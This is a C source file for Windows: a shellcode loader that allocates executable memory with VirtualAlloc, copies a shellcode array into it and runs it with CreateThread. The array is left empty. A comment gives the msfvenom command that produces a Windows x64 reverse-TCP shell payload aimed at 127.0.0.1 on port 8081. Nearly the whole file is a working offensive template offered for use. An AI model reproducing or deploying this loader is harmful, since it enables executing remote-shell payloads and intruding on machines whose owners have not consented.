#include <windows.h> // Windows API
#include <stdio.h>

int main()
{
    char shellcode[] = {
        // shellcode generated by msfvenom
        // example : msfvenom -p windows/x64/shell_reverse_tcp lhost=127.0.0.1 lport=8081 -f c
    };
    int lenShellcode = sizeof(shellcode); 
    void *allocatedMemory;

    allocatedMemory = VirtualAlloc(NULL, lenShellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // Allocate memory in a specific region with the length of the shellcode
    RtlMoveMemory(allocatedMemory, shellcode, lenShellcode); // move the shellcode to the allocated memory region
    CreateThread(NULL, 8, (LPTHREAD_START_ROUTINE) allocatedMemory, NULL, 0, NULL); // Create a thread and execute code, Points to the memory location created using the VirtualAlloc
    Sleep(1000); // Pause 1 seconds
    return 0;
}
